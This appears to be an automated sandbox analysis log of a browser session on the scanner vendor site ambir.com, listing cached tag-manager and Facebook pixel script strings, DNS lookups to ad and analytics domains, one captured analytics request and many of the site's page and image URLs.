src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" class="lazyload" data-src="https://ambir.com/wp-content/uploads/2023/11/youtube.jpg"></a> equals www.twitter.com (Twitter)
      Source: chromecache_181.2.drString found in binary or memory: <a href="https://www.facebook.com/ambirtechnology" target="_blank"><img decoding="async" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" class="lazyload" data-src="https://ambir.com/wp-content/uploads/2023/11/fb.jpg"></a> <a href="https://www.linkedin.com/company/ambir-technology" target="_blank"><img decoding="async" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" class="lazyload" data-src="https://ambir.com/wp-content/uploads/2023/11/linkedin.jpg"></a> <a href="https://twitter.com/ambirtechnology" target="_blank"><img decoding="async" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" class="lazyload" data-src="https://ambir.com/wp-content/uploads/2023/11/twitter.jpg"></a> <a href="https://www.youtube.com/channel/UCN87hTTavP6CHRiUK9JGz_w" target="_blank"><img decoding="async" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" class="lazyload" data-src="https://ambir.com/wp-content/uploads/2023/11/youtube.jpg"></a> equals www.youtube.com (Youtube)
      Source: chromecache_190.2.dr, chromecache_205.2.dr, chromecache_172.2.dr, chromecache_279.2.dr, chromecache_160.2.dr, chromecache_168.2.drString found in binary or memory: Math.round(q);t["gtm.videoElapsedTime"]=Math.round(f);t["gtm.videoPercent"]=r;t["gtm.videoVisible"]=u;return t},Ak:function(){e=qb()},zd:function(){d()}}};var Zb=wa(["data-gtm-yt-inspected-"]),ID=["www.youtube.com","www.youtube-nocookie.com"],JD,KD=!1; equals www.youtube.com (Youtube)
      Source: chromecache_190.2.dr, chromecache_205.2.dr, chromecache_172.2.dr, chromecache_279.2.dr, chromecache_160.2.dr, chromecache_168.2.drString found in binary or memory: c?"runIfCanceled":"runIfUncanceled",[]);if(!g.length)return!0;var k=oB(a,c,e);V(121);if(k["gtm.elementUrl"]==="https://www.facebook.com/tr/")return V(122),!0;if(d&&f){for(var m=Bb(b,g.length),n=0;n<g.length;++n)g[n](k,m);return m.done}for(var p=0;p<g.length;++p)g[p](k,function(){});return!0},rB=function(){var a=[],b=function(c){return eb(a,function(d){return d.form===c})};return{store:function(c,d){var e=b(c);e?e.button=d:a.push({form:c,button:d})},get:function(c){var d=b(c);return d?d.button:null}}}, equals www.facebook.com (Facebook)
      Source: chromecache_190.2.dr, chromecache_205.2.dr, chromecache_172.2.dr, chromecache_279.2.dr, chromecache_160.2.dr, chromecache_168.2.drString found in binary or memory: if(!(e||f||g||k.length||m.length))return;var p={Dh:e,Bh:f,Ch:g,ji:k,ki:m,Re:n,Ib:b},q=B.YT;if(q)return q.ready&&q.ready(d),b;var r=B.onYouTubeIframeAPIReady;B.onYouTubeIframeAPIReady=function(){r&&r();d()};H(function(){for(var u=E.getElementsByTagName("script"),v=u.length,t=0;t<v;t++){var w=u[t].getAttribute("src");if(TD(w,"iframe_api")||TD(w,"player_api"))return b}for(var x=E.getElementsByTagName("iframe"),y=x.length,A=0;A<y;A++)if(!KD&&RD(x[A],p.Re))return qc("https://www.youtube.com/iframe_api"), equals www.youtube.com (Youtube)
      Source: chromecache_162.2.dr, chromecache_204.2.drString found in binary or memory: return b}GD.F="internal.enableAutoEventOnTimer";var Zb=wa(["data-gtm-yt-inspected-"]),ID=["www.youtube.com","www.youtube-nocookie.com"],JD,KD=!1; equals www.youtube.com (Youtube)
      Source: chromecache_271.2.drString found in binary or memory: return function(a,b,c,d){var e={exports:{}};e.exports;(function(){"use strict";var b=f.getFbeventsModules("signalsFBEventsGetTier"),c=d();function d(){try{if(a.trustedTypes&&a.trustedTypes.createPolicy){var b=a.trustedTypes;return b.createPolicy("facebook.com/signals/iwl",{createScriptURL:function(a){var b=new URL(a);b=b.hostname.endsWith(".facebook.com")&&b.pathname=="/signals/iwl.js";if(!b)throw new Error("Disallowed script URL");return a}})}}catch(a){}return null}e.exports=function(a,d){d=b(d);d=d==null?"www.facebook.com":"www."+d+".facebook.com";d="https://"+d+"/signals/iwl.js?pixel_id="+a;if(c!=null)return c.createScriptURL(d);else return d}})();return e.exports}(a,b,c,d)}); equals www.facebook.com (Facebook)
      Source: chromecache_271.2.drString found in binary or memory: return function(f,b,c,d){var e={exports:{}};e.exports;(function(){"use strict";var a=/^https:\/\/www\.([A-Za-z0-9\.]+)\.facebook\.com\/tr\/?$/,b=["https://www.facebook.com/tr","https://www.facebook.com/tr/"];e.exports=function(c){if(b.indexOf(c)!==-1)return null;var d=a.exec(c);if(d==null)throw new Error("Malformed tier: "+c);return d[1]}})();return e.exports}(a,b,c,d)}); equals www.facebook.com (Facebook)
      Source: chromecache_271.2.drString found in binary or memory: return function(f,g,h,i){var j={exports:{}};j.exports;(function(){"use strict";var a={ENDPOINT:"https://www.facebook.com/tr/",INSTAGRAM_TRIGGER_ATTRIBUTION:"https://www.instagram.com/tr/",AEM_ENDPOINT:"https://www.facebook.com/.well-known/aggregated-event-measurement/",GPS_ENDPOINT:"https://www.facebook.com/privacy_sandbox/pixel/register/trigger/",TOPICS_API_ENDPOINT:"https://www.facebook.com/privacy_sandbox/topics/registration/"};j.exports=a})();return j.exports}(a,b,c,d)}); equals www.facebook.com (Facebook)
      Source: chromecache_190.2.dr, chromecache_205.2.dr, chromecache_172.2.dr, chromecache_279.2.dr, chromecache_160.2.dr, chromecache_168.2.drString found in binary or memory: var VC=function(a,b,c,d,e){var f=MA("fsl",c?"nv.mwt":"mwt",0),g;g=c?MA("fsl","nv.ids",[]):MA("fsl","ids",[]);if(!g.length)return!0;var k=RA(a,"gtm.formSubmit",g),m=a.action;m&&m.tagName&&(m=a.cloneNode(!1).action);V(121);if(m==="https://www.facebook.com/tr/")return V(122),!0;k["gtm.elementUrl"]=m;k["gtm.formCanceled"]=c;a.getAttribute("name")!=null&&(k["gtm.interactedFormName"]=a.getAttribute("name"));e&&(k["gtm.formSubmitElement"]=e,k["gtm.formSubmitElementText"]=e.value);if(d&&f){if(!xz(k,zz(b, equals www.facebook.com (Facebook)
      Source: global trafficDNS traffic detected: DNS query: ambir.com
      Source: global trafficDNS traffic detected: DNS query: platform-api.sharethis.com
      Source: global trafficDNS traffic detected: DNS query: maxcdn.bootstrapcdn.com
      Source: global trafficDNS traffic detected: DNS query: www.google.com
      Source: global trafficDNS traffic detected: DNS query: nyciot.com
      Source: global trafficDNS traffic detected: DNS query: forms.zohopublic.com
      Source: global trafficDNS traffic detected: DNS query: static.zohocdn.com
      Source: global trafficDNS traffic detected: DNS query: s.adroll.com
      Source: global trafficDNS traffic detected: DNS query: www.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: analytics.google.com
      Source: global trafficDNS traffic detected: DNS query: td.doubleclick.net
      Source: global trafficDNS traffic detected: DNS query: accounts.zoho.com
      Source: global trafficDNS traffic detected: DNS query: sdks.shopifycdn.com
      Source: global trafficDNS traffic detected: DNS query: webfonts.zohowebstatic.com
      Source: global trafficDNS traffic detected: DNS query: acsbapp.com
      Source: global trafficDNS traffic detected: DNS query: googleads.g.doubleclick.net
      Source: global trafficDNS traffic detected: DNS query: static.olark.com
      Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: use.fontawesome.com
      Source: global trafficDNS traffic detected: DNS query: d.adroll.com
      Source: global trafficDNS traffic detected: DNS query: stats.g.doubleclick.net
      Source: global trafficDNS traffic detected: DNS query: x.adroll.com
      Source: global trafficDNS traffic detected: DNS query: connect.facebook.net
      Source: global trafficDNS traffic detected: DNS query: knrpc.olark.com
      Source: global trafficDNS traffic detected: DNS query: x.bidswitch.net
      Source: global trafficDNS traffic detected: DNS query: pixel.tapad.com
      Source: global trafficDNS traffic detected: DNS query: cm.g.doubleclick.net
      Source: global trafficDNS traffic detected: DNS query: dsum-sec.casalemedia.com
      Source: global trafficDNS traffic detected: DNS query: idsync.rlcdn.com
      Source: global trafficDNS traffic detected: DNS query: pixel.rubiconproject.com
      Source: global trafficDNS traffic detected: DNS query: match.adsrvr.org
      Source: global trafficDNS traffic detected: DNS query: api.olark.com
      Source: global trafficDNS traffic detected: DNS query: pippio.com
      Source: global trafficDNS traffic detected: DNS query: us-u.openx.net
      Source: global trafficDNS traffic detected: DNS query: sync.outbrain.com
      Source: global trafficDNS traffic detected: DNS query: px.ads.linkedin.com
      Source: global trafficDNS traffic detected: DNS query: image2.pubmatic.com
      Source: global trafficDNS traffic detected: DNS query: ups.analytics.yahoo.com
      Source: global trafficDNS traffic detected: DNS query: log.olark.com
      Source: global trafficDNS traffic detected: DNS query: sync.taboola.com
      Source: global trafficDNS traffic detected: DNS query: eb2.3lift.com
      Source: global trafficDNS traffic detected: DNS query: ib.adnxs.com
      Source: unknownHTTP traffic detected: POST /g/collect?v=2&tid=G-5NGH3KRVGD&gtm=45be4bj0v9180601725za200&_p=1732134497159&_gaz=1&gcd=13l3l3l3l1l1&npa=0&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081485&cid=59994235.1732134501&ecid=1978750408&ul=en-us&sr=1280x1024&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&are=1&pae=1&frm=0&pscdl=noapi&ec_mode=a&_s=1&sid=1732134500&sct=1&seg=0&dl=https%3A%2F%2Fambir.com%2Fambir-card-scanners%2F&dt=Ambir%20Card%20Scanners%20-%20AMBIR%20Technology&en=page_view&_fv=1&_nsi=1&_ss=1&_ee=1&tfd=11005 HTTP/1.1Host: analytics.google.comConnection: keep-aliveContent-Length: 0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://ambir.comX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Nov 2024 20:28:35 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingVary: Accept-EncodingVary: Accept-EncodingExpires: Wed, 11 Jan 1984 05:00:00 GMTLink: <https://ambir.com/wp-json/>; rel="https://api.w.org/"WPO-Cache-Status: not cachedWPO-Cache-Message: Page type is not cacheable (search, 404 or password-protected), This page returned an HTTP unauthorised response code (404)X-Powered-By: WP EngineX-Cacheable: non200Cache-Control: max-age=600, must-revalidateX-Cache: HIT: 2X-Cache-Group: normalX-Orig-Cache-Control: no-cache, must-revalidate, max-age=0CF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 8e5b2ff02e3b8c99-EWRalt-svc: h3=":443"; ma=86400
      Source: chromecache_236.2.dr, chromecache_230.2.drString found in binary or memory: http://a.adroll.com
      Source: chromecache_237.2.drString found in binary or memory: http://fontawesome.com
      Source: chromecache_237.2.drString found in binary or memory: http://fontawesome.com/license
      Source: chromecache_199.2.drString found in binary or memory: http://fontawesome.io
      Source: chromecache_199.2.drString found in binary or memory: http://fontawesome.io/license
      Source: chromecache_200.2.dr, chromecache_254.2.dr, chromecache_215.2.drString found in binary or memory: http://getbootstrap.com)
      Source: chromecache_270.2.dr, chromecache_219.2.drString found in binary or memory: http://malsup.com/jquery/block/
      Source: chromecache_270.2.dr, chromecache_219.2.drString found in binary or memory: http://www.gnu.org/licenses/gpl.html
      Source: chromecache_270.2.dr, chromecache_219.2.drString found in binary or memory: http://www.opensource.org/licenses/mit-license.php
      Source: chromecache_195.2.drString found in binary or memory: https://accounts.zoho.com
      Source: chromecache_195.2.drString found in binary or memory: https://accounts.zoho.com/static/showcaptcha?digest=1_C_38981b8bddce8f162a418db411f998572c5cedc5527e
      Source: chromecache_181.2.drString found in binary or memory: https://acsbapp.com/apps/app/dist/js/app.js
      Source: chromecache_204.2.drString found in binary or memory: https://adservice.google.com/pagead/regclk?
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/#/schema/logo/image/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/#organization
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/#website
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/?p=2990
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/?s=
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/about/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/accounting-solutions/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/all-ambir-drivers/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/ambir-barcode-scanners-for-keena-healthcare-technology/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/ambir-card-scanners/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/ambir-card-scanners/#breadcrumb
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/ambir-card-scanners/#primaryimage
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/ambir-for-docmgt/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/ambir-for-hyland-onbase/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/ambir-news-and-events/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/ambirbcs-setup/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/ambirscan-bcs-scanners/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/ambirscan-bcs/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/ambirscan-pro-setup/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/ambirscan-pro-software/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/ambirscan-receipt/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/ambirscan-setup/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/ambirscan/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/ambirscanrs-setup/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/ath-support/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/athenahealth/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/barcode-scanner-set-up/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/barcode-scanners/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/blog/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/blog/ambir-announces-certification-of-its-scanners-for-docmgt/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/blog/ambir-to-exhibit-and-sponsor-modmeds-customer-event-momentum-24/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/blog/understanding-the-esign-act-and-ueta-and-the-need-for-integrated-esignatures-
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/compulink/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/consumables/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/contact-us/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/dental-solutions/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/developers/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/document-scanners/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/epic/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/esignature-solutions/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/extended-warranties/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/faqs/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/federally-qualified-health-clinic-fqhc/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/flexicam-document-camera-and-web-cam/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/flexicam-support/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/group-practices/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/high-speed-adf-workgroup-scanners/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/hospitals/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/how-to-buy/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/kareo/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/lp400-setup/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/lp400-thermal-printer/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/market-solutions/field-services/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/market-solutions/financial-solutions/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/market-solutions/government-solutions/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/market-solutions/healthcare-solutions/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/market-solutions/hospitality-rental/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/market-solutions/legal-solutions/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/market-solutions/optometry-solutions/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/market-solutions/transportation-solutions-2/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/msi-installer-request/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/news-room/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/nextgen/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/nscan-1060-60-ppm-high-speed-document-document-card-and-passport-scanner/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/nscan-690gt-duplex-id-card-scanner/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/owner-benefits/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/practice-fusion/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/privacy-policy/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/product/ambir-card-scanner-ps670st/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/product/duplex-a6-id-card-scanner-with-ambirscan-ds687-as/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/product/imagescan-pro-490i-scanner-ds490-as/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/product/imagescan-pro-820ix-ds820ix-as/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/product/nscan-690gt-duplex-id-card-scanner/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/product/nscan-700gt-hybrid-duplex-document-and-card-scanner-with-ambirscan-ds700gt
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/product/simplex-id-card-scanner-w-ambirscan-ps667-as/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/product/travelscan-pro-simplex-document-id-scanner-with-ambirscan-ps600-as/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/resellers/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/scanner-cables-usb/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/sigpad-setup-tw/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/small-practices/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/support/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/terms-and-conditions-2017/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/tutorial-videos/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/warranty-information/
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/wp-admin/admin-ajax.php
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/wp-content/cache/wpo-minify/1732127092/assets/wpo-minify-footer-54e41265.min.js
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/wp-content/cache/wpo-minify/1732127092/assets/wpo-minify-footer-71030d0b.min.js
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/wp-content/cache/wpo-minify/1732127092/assets/wpo-minify-footer-804f7b28.min.js
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/wp-content/cache/wpo-minify/1732127092/assets/wpo-minify-footer-9eda13b5.min.js
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/wp-content/cache/wpo-minify/1732127092/assets/wpo-minify-footer-b7463f6d.min.css
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/wp-content/cache/wpo-minify/1732127092/assets/wpo-minify-header-7ba40e52.min.js
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/wp-content/cache/wpo-minify/1732127092/assets/wpo-minify-header-9afea242.min.css
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/wp-content/cache/wpo-minify/1732127092/assets/wpo-minify-header-aead31c6.min.js
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/wp-content/cache/wpo-minify/1732127092/assets/wpo-minify-header-c51b1940.min.css
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/wp-content/cache/wpo-minify/1732127092/assets/wpo-minify-header-ee83140b.min.css
      Source: chromecache_148.2.drString found in binary or memory: https://ambir.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/../webfonts/fa-solid-900.
      Source: chromecache_148.2.drString found in binary or memory: https://ambir.com/wp-content/plugins/quadmenu/assets/frontend/owlcarousel/owl.video.play.png)
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/wp-content/plugins/woocommerce/assets/fonts/Inter-VariableFont_slnt
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/wp-content/plugins/woocommerce/assets/fonts/cardo_normal_400.woff2
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/wp-content/themes/ambir/css/bootstrap.min.css
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/wp-content/themes/ambir/css/font-awesome.css
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/wp-content/themes/ambir/css/hamburgers.css
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/wp-content/themes/ambir/css/lightbox.min.css
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/wp-content/themes/ambir/css/owl.carousel.css
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/wp-content/themes/ambir/favicon.png
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/wp-content/themes/ambir/images/cerrar2.png
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/wp-content/themes/ambir/images/search.png
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/wp-content/themes/ambir/images/search2.png
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/wp-content/themes/ambir/js/owl.carousel.min.js
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/wp-content/themes/ambir/style.css?v=1732127239
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/wp-content/uploads/2023/08/Ambir_logo_22.png
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/wp-content/uploads/2023/08/cropped-favicon-180x180.png
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/wp-content/uploads/2023/08/cropped-favicon-192x192.png
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/wp-content/uploads/2023/08/cropped-favicon-270x270.png
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/wp-content/uploads/2023/08/cropped-favicon-32x32.png
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/wp-content/uploads/2023/08/slide2-1024x603.jpg
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/wp-content/uploads/2023/08/slide2-300x177.jpg
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/wp-content/uploads/2023/08/slide2-600x353.jpg
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/wp-content/uploads/2023/08/slide2-768x452.jpg
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/wp-content/uploads/2023/08/slide2.jpg
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/wp-content/uploads/2023/09/AmbirScan_cloud_cap_NL-1024x777.jpg
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/wp-content/uploads/2023/09/AmbirScan_cloud_cap_NL-300x228.jpg
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/wp-content/uploads/2023/09/AmbirScan_cloud_cap_NL-600x455.jpg
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/wp-content/uploads/2023/09/AmbirScan_cloud_cap_NL-768x583.jpg
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/wp-content/uploads/2023/09/AmbirScan_cloud_cap_NL.jpg
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/wp-content/uploads/2023/09/logos-300x53.png
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/wp-content/uploads/2023/09/logos.png
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/wp-content/uploads/2023/10/Banking_card_scanners-1024x631.jpg
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/wp-content/uploads/2023/10/Banking_card_scanners-1536x946.jpg
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/wp-content/uploads/2023/10/Banking_card_scanners-300x185.jpg
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/wp-content/uploads/2023/10/Banking_card_scanners-600x370.jpg
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/wp-content/uploads/2023/10/Banking_card_scanners-768x473.jpg
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/wp-content/uploads/2023/10/Banking_card_scanners.jpg
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/wp-content/uploads/2023/10/HC_document_scanners-1024x631.jpg
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/wp-content/uploads/2023/10/HC_document_scanners-1536x946.jpg
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/wp-content/uploads/2023/10/HC_document_scanners-300x185.jpg
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/wp-content/uploads/2023/10/HC_document_scanners-600x370.jpg
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/wp-content/uploads/2023/10/HC_document_scanners-768x473.jpg
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/wp-content/uploads/2023/10/HC_document_scanners.jpg
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/wp-content/uploads/2023/10/PS667_DS687_Card_Scanners-1024x208.jpg
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/wp-content/uploads/2023/10/PS667_DS687_Card_Scanners-300x61.jpg
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/wp-content/uploads/2023/10/PS667_DS687_Card_Scanners-600x122.jpg
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/wp-content/uploads/2023/10/PS667_DS687_Card_Scanners-768x156.jpg
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/wp-content/uploads/2023/10/PS667_DS687_Card_Scanners.jpg
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/wp-content/uploads/2023/10/Partners_Document_Scanners-300x197.jpg
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/wp-content/uploads/2023/10/Partners_Document_Scanners-600x394.jpg
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/wp-content/uploads/2023/10/Partners_Document_Scanners-768x504.jpg
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/wp-content/uploads/2023/10/Partners_Document_Scanners.jpg
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/wp-content/uploads/2023/10/US-MAP-category-pages_NL-1024x777.jpg
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/wp-content/uploads/2023/10/US-MAP-category-pages_NL-300x228.jpg
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/wp-content/uploads/2023/10/US-MAP-category-pages_NL-600x455.jpg
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/wp-content/uploads/2023/10/US-MAP-category-pages_NL-768x583.jpg
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/wp-content/uploads/2023/10/US-MAP-category-pages_NL.jpg
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/wp-content/uploads/2023/10/card-document-scanners_225h-300x152.jpg
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/wp-content/uploads/2023/10/card-document-scanners_225h.jpg
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/wp-content/uploads/2024/02/DS490_Shopify_square-100x100.jpg
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/wp-content/uploads/2024/02/DS490_Shopify_square-1024x1024.jpg
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/wp-content/uploads/2024/02/DS490_Shopify_square-150x150.jpg
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/wp-content/uploads/2024/02/DS490_Shopify_square-1536x1536.jpg
      Source: chromecache_181.2.drString found in binary or memory: https://ambir.com/wp-content/uploads/2024/02/DS490_Shopify_square-2048x2048.jpg
